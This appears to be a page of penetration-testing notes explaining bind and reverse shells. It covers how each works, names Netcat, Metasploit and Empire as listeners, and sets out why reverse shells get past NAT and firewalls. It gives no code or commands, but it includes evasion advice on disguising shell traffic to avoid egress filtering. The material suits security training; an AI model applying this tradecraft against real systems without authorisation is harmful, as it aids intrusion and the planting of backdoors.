Bind and Reverse shell
Last updated
Last updated
Reverse shells can be initiated using many different programming and scripting languages including PHP, ASP, Python, Perl and PowerShell. If you have managed to get code execution on a compromised host or you can inject code, upload or include files in a web application, this can often be turned into a command-line shell with just a little work no matter what the platform or application language. For receiving the shell on the attack box, we can use several different tools such as Netcat, Metasploit and Empire
A bind shell is, as the reverse shell, also set up on the target host, but instead of connecting back to a listening host, it binds to a specific port and waits for incoming connections. In malicious software terms a bind shell is what is referred to as a ‘backdoor’.
One advantage of reverse shells is that they have the highest success rate if there are firewalls and NAT devices between the attacker and the victim. For instance, when the target host connects to the internet through a NAT device an attacker won’t be able to connect to the target host directly without first configuring the target’s networking equipment. In this situation, bind shells won’t work, but can be possible to establish a connection using a reverse shell. Another advantage of reverse shells is that outgoing connections are normally not as heavily filtered by a firewall as incoming connections. Even so, you should keep in mind that egress rules may apply and suspicious connections (such as connections on port 4444) may still get flagged and blocked preventing the reverse shell from reaching you. If you can disguise your traffic to look like legitimate traffic, your chances of success increase and your reverse shell is less likely to be blocked.
As explained earlier in this chapter a bind shell is a shell that binds to a specific port on the target host to listen for incoming connections. In this case the attack box connects to the target host on a specific port (rather than the target sending the shell back to the attack box as in a reverse shell).
IMP: When working with bind shells it is important to realize their limitations. First of all, the attacker must have a route to the target. If the target is behind a NAT device, the bind shell will open a port on the local network that is inaccessible to the attacker. Another important factor is that bind shells can only bind to an open and unused port. Thus, if there’s a web server running on port 80 and 443 and you are trying to bind a shell to one of these ports to make your traffic look legitimate, you will fail. Lastly it is very common for unusual ports to be blocked by firewalls. Most firewalls are configured to allow access only for specific traffic to known services. If a firewall blocks traffic to your port set in your bind shell you may be able to open up the port on the target host, but you won’t be able to connect to it. In this sort of scenario, a reverse shell has more chance of success.